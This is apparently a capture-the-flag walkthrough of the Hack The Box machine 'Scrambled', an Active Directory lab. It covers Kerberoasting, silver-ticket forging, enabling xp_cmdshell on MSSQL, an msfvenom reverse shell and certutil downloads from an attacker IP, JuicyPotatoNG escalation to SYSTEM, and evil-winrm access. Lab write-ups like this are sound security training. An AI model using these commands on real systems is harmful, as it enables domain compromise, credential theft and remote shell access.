Scrambled
Port scan
$ sudo nmap 10.10.11.168 -p- -T4 --min-rate=10000 -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-17 02:55:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after: 2025-07-17T02:44:27
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after: 2025-07-17T02:44:27
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-17T02:54:17
|_Not valid after: 2054-07-17T02:54:17
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after: 2025-07-17T02:44:27
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-07-17T02:44:27
|_Not valid after: 2025-07-17T02:44:27
|_ssl-date: 2024-07-17T02:58:43+00:00; -2s from scanner time.
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
$ echo "10.10.11.168 dc.scrm.local dc1.scrm.local scrm.local" | sudo tee -a /etc/hosts
Web app (port 80)
NTLM authentication is disabled.
support@scramblecorp.com
ksimpson
It shows there is a possibility to reset a user's password same as his/her username. So, we can try ksimpson:ksimpson.
SMB server
$ crackmapexec smb 10.10.11.168 -u 'ksimpson' -p 'ksimpson' --shares
$ smbmap -H 10.10.11.168 -u 'ksimpson' -p 'ksimpson'
Crackmapexec and smbmap both don't work. Because when I'm doing this box, it already retired and I'm doing it in Guided Mode. So, I know the credential can log into the SMB server. After doing some research, I found smbclient of impacket.
# -k for kerberoast authentication
$ impacket-smbclient scrm.local/ksimpson:ksimpson@dc1.scrm.local -k -dc-ip 10.10.11.168
Can use this command to access SMB
$ crackmapexec smb dc1.scrm.local -u 'ksimpson' -p 'ksimpson' --shares -k -d scrm.local
Network Security Changes.pdf
Kerberoast attack (GetUserSPNs)
$ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -target-domain scrm.local -k -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -request
sqlsvc:Pegasus60
Convert plaintext password to NTLM hash
Generate NTLM hashes via command line
$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05
Get the domain SID by ldapsearch
$ ldapsearch -H ldap://dc1.scrm.local -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)"
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563
# Download server certificate
$ openssl s_client -connect dc1.scrm.local:636
# oneline command
$ echo -n | openssl s_client -connect dc1.scrm.local:636 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem
Connecting to 10.10.11.168
depth=0 CN=DC1.scrm.local
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN=DC1.scrm.local
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN=DC1.scrm.local
verify return:1
DONE
Edit /etc/ldap/ldap.conf to point out the certificate
#
# LDAP Defaults
#
# See ldap.conf(5) for details
# This file should be world readable but not world writable.
#BASE dc=example,dc=com
#URI ldap://ldap.example.com ldap://ldap-provider.example.com:666
#SIZELIMIT 12
#TIMELIMIT 15
#DEREF never
# TLS certificates (needed for GnuTLS)
# TLS_CACERT /etc/ssl/certs/ca-certificates.crt
TLS_CACERT /home/kali/HTB/Scrambled/ldapserver.pem
# -Z start TLS request
$ ldapsearch -H ldap://dc1.scrm.local -Z -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)" > ldapsearch.opt
AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
Convert a SID between binary and string forms
#!/usr/bin/env python3
import base64
import struct
import sys
b64sid = sys.argv[1]
binsid = base64.b64decode(b64sid)
a, N, cccc, dddd, eeee, ffff, gggg = struct.unpack("BBxxxxxxIIIII", binsid)
bb, bbbb = struct.unpack(">xxHIxxxxxxxxxxxxxxxxxxxx", binsid)
bbbbbb = (bb << 32) | bbbb
print(f"S-{a}-{bbbbbb}-{cccc}-{dddd}-{eeee}-{ffff}-{gggg}")
$ python sid.py AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
S-1-5-21-2743207045-1827831105-2542523200-500
The domain SID is that SID without the -500.
Get the domain SID by getPac.py
$ impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
Generate ticket
$ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
MSSql (port 1433)
On Linux, Kerberos looks in predefined places for tickets, like /tmp/krb5cc_[uid of current user] and any file pointed to by the KRB5CCACHE environment variable.
$ KRB5CCNAME=administrator.ccache impacket-mssqlclient -k dc1.scrm.local
SQL> select name, database_id from sys.databases;
name database_id
---------- -----------
master 1
tempdb 2
model 3
msdb 4
ScrambleHR 5
SQL> use ScrambleHR;
SQL> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME
----------
Employees
UserImport
Timesheets
SQL> select * from Employees;
SQL> select * from UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
# Check if xp_cmdshell is enabled
SQL> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
SQL> sp_configure 'show advanced options', '1';
SQL> RECONFIGURE;
SQL> sp_configure 'xp_cmdshell', '1';
SQL> RECONFIGURE;
The mssql can run xp_cmdshell
User sqlsvc (unintended way)
This is not the intended way to solve the box. Because you cannot find user.txt on sqlsvc's desktop. And I'm following the Guided Mode, so I know it's not.
SQL> xp_cmdshell powershell -e JABjAGwAaQBlA......
The user has SeImpersonatePrivilege privilege. We can try juicypotato.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f exe > shell.exe
Upload shell.exe and JuicyPotatoNG.exe to the target box.
> certutil -f -urlcache http://10.10.16.2/JuicyPotatoNG.exe juicypotato.exe
> certutil -f -urlcache http://10.10.16.2/shell.exe shell.exe
> .\juicypotato.exe -t * -p C:\users\sqlsvc\shell.exe
JuicyPotatoNG
by decoder_it & splinter_code
[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful!
User MiscSvc (Designed way)
MiscSvc:ScrambledEggs9900
Configure Realm
I’ll need to add this domain to my local krb5.conf file:
My Kali doesn't have /etc/krb5.conf, so install krb5 sudo apt-get install krb5-user.
Change /etc/krb5.conf to:
[libdefaults]
default_realm = SCRM.LOCAL
# The following libdefaults parameters are only for Heimdal Kerberos.
# fcc-mit-ticketflags = true
[realms]
SCRM.LOCAL = {
kdc = dc1.scrm.local
#admin_server = dc1.scrm.local
}
[domain_realm]
.scrm.local = SCRM.LOCAL
scrm.local = SCRM.LOCAL
$ impacket-getTGT scrm.local/MiscSvc:ScrambledEggs9900
Impacket v0.11.0 - Copyright 2023 Fortra
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
$ sudo ntpdate -u scrm.local
2024-07-17 03:13:12.674924 (-0400) -86408.498354 +/- 0.104567 scrm.local 10.10.11.168 s1 no-leap
CLOCK: time stepped by -86408.498354
CLOCK: time changed from 2024-07-18 to 2024-07-17
$ impacket-getTGT scrm.local/MiscSvc:ScrambledEggs9900
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in MiscSvc.ccache
$ export KRB5CCNAME=MiscSvc.ccache
$ evil-winrm -r SCRM.LOCAL -i dc1.scrm.local
The ticket will expire soon after creating, you may need to repeat the procedures several time to get interactive connection.
